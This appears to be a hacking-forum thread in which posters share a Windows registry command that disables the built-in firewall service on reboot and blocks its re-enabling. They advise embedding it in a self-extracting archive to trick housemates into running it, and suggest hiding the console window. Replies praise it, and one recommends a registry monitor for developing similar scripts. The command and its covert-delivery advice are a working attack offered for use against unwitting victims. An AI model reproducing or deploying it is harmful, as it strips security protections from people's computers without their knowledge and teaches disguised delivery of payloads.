Heres a little technique we put 2getha to hack our other housem8's. Build the following command into whatever you can - we built it into an SFX, probably one of the best techniques as people dont expect it most of the time.

cmd /c reg add HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess /v ImagePath /t REG_EXPAND_SZ /d C:\WINDOWS\System32\svchost.exe /f

Once they have extracted the SFX, the following command will run. On reboot their firewall will have been disabled, and you will notice that when you go into network settings and try and re-enable it, it cannot be done.

Obviously build it up with other commands, we have alot better ones but dont want to reveal all the secrets in one go :-)

N.B - u dont have to use 'cmd /c' at the beginning of the script, we just had to use it because of the way we are implementing this script. If u can always use if without the cmd /c as it will be invisible, i.e - no flash of the console.

KB & ChEz

very nice kbnet as usual!
FLX

Wow gr8 find

Best way to develop this kinda stuff is to get windows registry monitors, i use RegMon. This allows you to watch the registry in real time. So before i use any program and am looking for particular reg keys it accesses i kick off RegMon and look for the changes I am expecting, this allows us to develop scripts like the above. I dont know of any other programs that are 'better' than RegMon, but if people use a different prog and think its good then please let me know.

Cheers

not bad